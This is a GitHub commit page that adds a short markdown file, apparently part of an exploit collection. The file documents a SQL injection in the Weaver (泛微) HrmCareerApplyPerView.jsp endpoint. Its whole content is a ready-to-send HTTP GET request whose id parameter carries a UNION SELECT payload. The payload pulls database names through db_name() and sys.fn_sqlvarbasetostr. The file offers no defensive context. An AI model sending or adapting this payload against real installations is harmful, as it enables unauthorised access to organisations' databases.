Create 泛微 HrmCareerApplyPerView sql注入漏洞.md

This commit is contained in:
wy876 2023-08-19 20:36:13 +08:00 committed by GitHub
parent 0178db40e0
commit 4e3c442d24
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23

View File

@ -0,0 +1,10 @@
## 泛微 HrmCareerApplyPerView sql注入漏洞
```
GET
/pweb/careerapply/HrmCareerApplyPerView.jsp?id=1%20union%20select%201,2,sys.fn_sqlvarbasetostr(db_name()),db_name(1),5,6,7 HTTP/1.1
Host: 127.0.0.1:7443
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML,like Gecko)
Accept-Encoding: gzip, deflate
Connection: close
```